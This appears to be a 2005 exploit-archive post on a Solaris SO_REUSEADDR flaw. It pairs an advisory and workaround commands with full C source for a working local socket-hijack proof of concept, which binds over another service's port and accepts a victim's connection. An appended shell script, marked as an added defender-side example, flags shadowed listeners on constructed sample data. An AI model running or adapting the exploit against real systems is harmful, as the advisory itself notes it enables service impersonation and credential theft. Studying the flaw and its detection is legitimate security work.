
solsockjack.c

Posted Jul 7, 2005
Authored by c0ntex

Solaris has a bug in the use of SO_REUSEADDR in that the kernel favors any socket binding operation that is more specific than the general *.* wildcard bind(). Due to this, a malicious socket can bind to an already bound interface if a specific IP address is used. Exploit included.

tags | exploit, kernel
systems | solaris
SHA-256 | 9a57bfc1f13e75c3b857db7f9fa66b1d8bc8b6525ba1d8a4eed4fea59f468b53

/*
****************************************************************************
$ An open security advisory #7 - SUN Solaris SO_REUSEADDR Local Socket Hijack Bug
****************************************************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: July 06 2005
3: Bug Impact Rate: Medium / High
4: Bug Scope Rate: Local / Remote
****************************************************************************
$ This advisory and/or proof of concept code must not be used for commercial gain.
****************************************************************************

Sun Microsystems
http://www.sun.com

Solaris has a bug in the use of SO_REUSEADDR in that the kernel favours any
socket binding operation that is more specific than the general "*.*"
wildcard bind(). As such, a malicious socket can bind to an already bound
interface if a specific IP address is used.

This hijack can be performed against any process listening on a port over
1024, including root-owned services; it is not limited to your own user
account. One can then mimic the original service and snoop usernames /
passwords, files and data with a trojan version of the software, or just
cause a DoS against the legitimate service, provided the service is bound to
a port above 1024 and uses the SO_REUSEADDR option.

A workaround is to mark the port numbers that are valuable to the system as
privileged. Using the following kernel parameter, you can set ports above
1024 to act as reserved so that only root can bind to them.

    tcp_extra_priv_ports_add

To view privileged ports, run the following command:

    ndd /dev/tcp tcp_extra_priv_ports

To set ports as privileged, run the following command:

    ndd -set /dev/tcp tcp_extra_priv_ports_add 8080

Affected: All Solaris versions.
Not affected: Linux, OpenBSD, FreeBSD, Windows.

SUN have released a patch for the issue which can be downloaded from
sunsolve.

Document Audience: PUBLIC
Document ID: 116965-08
Title: Obsoleted by: 116965-09 SunOS 5.8: ip/arp/tcp/udp patch
Update Date: Thu May 05 09:28:25 MDT 2005
See Patch Revision History

Patch Id: 116965-08

Problem Description:

5089150 Binding to a port which has already been bound may incorrectly succeed

*/

/* solsockjack.c */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/utsname.h>
#include <arpa/inet.h>

/* Characters that may not appear in the -h argument */
#define BAD         "!@#$%^&*()-_=+[]{};':\",/<>?\\|`~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
#define DEFHOST     "localhost"
#define MAX_INCONN  1
#define PORT        1241    /* Nessus */
#define SYSTEM      "SunOS"

/* ANSI colour escapes used in the status output */
#define BL          "\x1B[1;34m"
#define NO          "\x1B[0m"
#define PI          "\x1B[35m"
#define PU          "\x1B[1;35m"
#define RE          "\x1B[1;31m"
#define WH          "\x1B[1;37m"
#define YE          "\x1B[1;33m"

void
banner(void)
{
    fprintf(stderr, "\n%s[-] %sSUN Solaris SPARC / x86 Local Socket Hijack Exploit\n", YE, NO);
    fprintf(stderr, "%s[-] %sKernel issue allows a bind on an already bound socket\n", YE, NO);
    fprintf(stderr, "%s[-] %sallowing a malicious user to impersonate a service that\n", YE, NO);
    fprintf(stderr, "%s[-] %sis already running on a port greater than 1024, making\n", YE, NO);
    fprintf(stderr, "%s[-] %sservice-in-the-middle attacks a trivial task to perform.\n", YE, NO);
    fprintf(stderr, "%s[-] %sDeveloped by c0ntex || c0ntexb@gmail.com%s\n\n", YE, WH, NO);

    _exit(EXIT_SUCCESS);
}

void
usage(int argc, char **argv)
{
    fprintf(stderr, "%s[-] %s Usage:\n", YE, NO);
    fprintf(stderr, "%s[-] %s\t -h \t\tIP address to bind socket to\n", YE, NO);
    fprintf(stderr, "%s[-] %s\t -p \t\tport number to attempt hijack of\n", YE, NO);
    fprintf(stderr, "%s[-] %s\t -v \t\tPrints this help\n", YE, NO);

    fprintf(stderr, "%s[-] %s%s -h 10.1.1.215 -p 1241\n\n", YE, NO, argv[0]);

    _exit(EXIT_FAILURE);
}

void
checkerr(char *isvuln)
{
    free(isvuln);
    puts("Not today!");
    _exit(EXIT_FAILURE);
}

void
jackerr(char *vulnerable)
{
    free(vulnerable);
    _exit(EXIT_FAILURE);
}

/* Return a heap copy of the uname() system name; the caller frees it. */
char
*checksys(char *isvuln)
{
    struct utsname name;
    size_t len;

    if(uname(&name) < 0) {
        puts("uname failed");
        _exit(EXIT_FAILURE);
    }

    isvuln = malloc(6);
    if(!isvuln) {
        perror("malloc");
        _exit(EXIT_FAILURE);
    }

    /* "SunOS" is 5 characters; anything longer cannot match and would not fit */
    len = strlen(name.sysname);
    if((len < 1) || (len > 5)) {
        checkerr(isvuln);
    }

    memcpy(isvuln, name.sysname, len);
    isvuln[len] = '\0';    /* memcpy() does not terminate the copy */

    return(isvuln);
}

int
main(int argc, char **argv)
{
    int jacksock, opts;
    int solvuln = 1;    /* option value for SO_REUSEADDR: non-zero enables it */
    int port = PORT;
    socklen_t inbuf;

    char *vulnerable = NULL;
    char *systype = NULL;
    char *isvuln = NULL;
    char *bad = NULL;

    struct sockaddr_in solaris, victims;

    if(argc < 2) {
        banner();
        _exit(EXIT_FAILURE);
    }

    if((systype = checksys(isvuln)) == NULL) {
        puts("Something messed up!");
        checkerr(isvuln);
    }

    if(strcmp(SYSTEM, systype) != 0) {
        puts("System is not supported - SunOS only!");
        checkerr(systype);
    }

    fprintf(stderr, "\n%s-> %sOK, potential vulnerable %s[%s] %ssystem, continuing..\n", WH, NO, BL, systype, NO);

    free(systype); sleep(2);

    while((opts = getopt(argc, argv, "h:p:v")) != -1) {
        switch(opts)
        {
            case 'h':
                bad = BAD;
                vulnerable = malloc(16);
                if(!vulnerable) {
                    perror("malloc");
                    _exit(EXIT_FAILURE);
                }

                /* Dotted-quad only: 7 to 15 characters, digits and dots */
                if((optarg == NULL) || (strlen(optarg) < 7) || (strlen(optarg) > 15) || strpbrk(bad, optarg)) {
                    puts("\n[-] Failed: IP address just isn't right!\n");
                    jackerr(vulnerable);
                }

                memcpy(vulnerable, optarg, strlen(optarg));
                vulnerable[strlen(optarg)] = '\0';    /* terminate the copy */
                break;
            case 'p':
                port = atoi(optarg);
                if((port < 1024) || (port > 65535)) {
                    puts("\n[-] Failed: Port number just isn't right!\n");
                    usage(argc, argv);
                    _exit(EXIT_FAILURE);
                }
                break;
            case 'v':
                usage(argc, argv);
                break;
            default:
                usage(argc, argv);
                break;
        }
    }

    if(vulnerable == NULL) {
        jackerr(vulnerable);
    }

    fprintf(stderr, "%s-> %sJacking port %s[%d] %sat address %s[%s]%s\n", WH, NO, PI, port, NO, PU, vulnerable, NO);

    jacksock = socket(AF_INET, SOCK_STREAM, 0);
    if(jacksock < 0) {
        perror("socket");
        jackerr(vulnerable);
    } sleep(2);

    if(setsockopt(jacksock, SOL_SOCKET, SO_REUSEADDR, &solvuln, sizeof(int)) < 0) {
        perror("setsockopt");
    }

    /* Bind to the specific address given with -h rather than the wildcard */
    memset(&solaris, '\0', sizeof(solaris));
    solaris.sin_family = AF_INET;
    solaris.sin_port = htons(port);
    solaris.sin_addr.s_addr = inet_addr(vulnerable);

    if(bind(jacksock, (struct sockaddr *)&solaris, sizeof(solaris)) < 0) {
        perror("bind");
        fprintf(stderr, "[-] %sFailed: %sCould not snag port, must be patched!\n", RE, NO);
        jackerr(vulnerable);
    }

    fprintf(stderr, "%s-> %s%sSuccess!! %sPort %s[%d] %shas been hijacked!\n%s-> %sWait...\n", WH, NO, YE, NO, PI, port, NO, WH, NO);

    if(listen(jacksock, MAX_INCONN) < 0) {
        perror("listen");
        puts("[-] Failed: Could not listen for an incoming connection!");
        jackerr(vulnerable);
    } sleep(2);

    fprintf(stderr, "%s-> %sOK, listening for incoming connections to compromise", WH, NO);

    inbuf = sizeof(victims);

    if(accept(jacksock, (struct sockaddr *)&victims, &inbuf) < 0) {
        perror("accept");
        puts("[-] Failed: Could not accept the incoming connection!");
        jackerr(vulnerable);
    }

    fprintf(stderr, "\n%s-> %sSnagged a victim connecting from %s[%s]%s\n", WH, NO, YE, inet_ntoa(victims.sin_addr), NO);

    sleep(1);

    close(jacksock);

    puts("-> Victim has been released to live another day!");

    sleep(1);

    puts("-> Test was a success!");

    free(vulnerable);

    return(0);
}
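
A defender-side check for the condition the advisory describes, added here as an example and not part of solsockjack.c: it flags non-privileged ports that have both a "*.port" listener and a specific-address listener, and says whether each port is already covered by the tcp_extra_priv_ports workaround. The function names, the sample data and the assumed `netstat -an -f inet -P tcp` column layout are constructed for illustration.

```shell
#!/bin/sh
# Added example: find listeners that shadow a wildcard bind on the same port.

# Constructed sample of Solaris `netstat -an -f inet -P tcp` output.
SAMPLE_NETSTAT='TCP: IPv4
   Local Address        Remote Address    Swind Send-Q Rwind Recv-Q    State
-------------------- -------------------- ----- ------ ----- ------ -----------
      *.22                 *.*                0      0 49152      0 LISTEN
      *.1241               *.*                0      0 49152      0 LISTEN
10.1.1.215.1241            *.*                0      0 49152      0 LISTEN
      *.8080               *.*                0      0 49152      0 LISTEN
10.1.1.215.8080            *.*                0      0 49152      0 LISTEN
10.1.1.215.6000            *.*                0      0 49152      0 LISTEN
10.1.1.215.1241      10.1.1.9.40112       49640      0 49640      0 ESTABLISHED'

# Constructed sample of `ndd /dev/tcp tcp_extra_priv_ports` output,
# assumed to be one port number per line.
SAMPLE_PRIV='2049
4045
8080'

# shadowed_listeners: read netstat text on stdin and print "port address"
# for every specific-address listener on a port >= 1024 that coexists
# with a wildcard (*.port) listener on the same port.
shadowed_listeners() {
    awk '
        $NF == "LISTEN" {
            la = $1
            i = length(la)
            # Solaris prints address.port, so split at the last dot.
            while (i > 0 && substr(la, i, 1) != ".") i--
            if (i == 0) next
            addr = substr(la, 1, i - 1)
            port = substr(la, i + 1)
            if (port !~ /^[0-9]+$/ || port + 0 < 1024) next
            if (addr == "*") wild[port] = 1
            else specific[port] = specific[port] " " addr
        }
        END {
            for (p in specific) if (p in wild) {
                n = split(specific[p], a, " ")
                for (k = 1; k <= n; k++) print p, a[k]
            }
        }
    ' | sort -n
}

# classify_shadowed NETSTAT_TEXT PRIV_PORT_LIST
# Tag each shadowed listener "reserved" when its port is already in
# tcp_extra_priv_ports (only root can bind it), otherwise "UNRESERVED".
classify_shadowed() {
    printf '%s\n' "$1" | shadowed_listeners | while read -r port addr; do
        if printf '%s\n' "$2" | grep -qx "$port"; then
            echo "$port $addr reserved"
        else
            echo "$port $addr UNRESERVED"
        fi
    done
}

# Demo on the constructed samples. On a live host, pass the real output:
#   classify_shadowed "$(netstat -an -f inet -P tcp)" \
#                     "$(ndd /dev/tcp tcp_extra_priv_ports)"
classify_shadowed "$SAMPLE_NETSTAT" "$SAMPLE_PRIV"
```

A service may legitimately listen on both the wildcard and a specific address, so each hit is something to check against the owning process rather than proof of a hijack.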
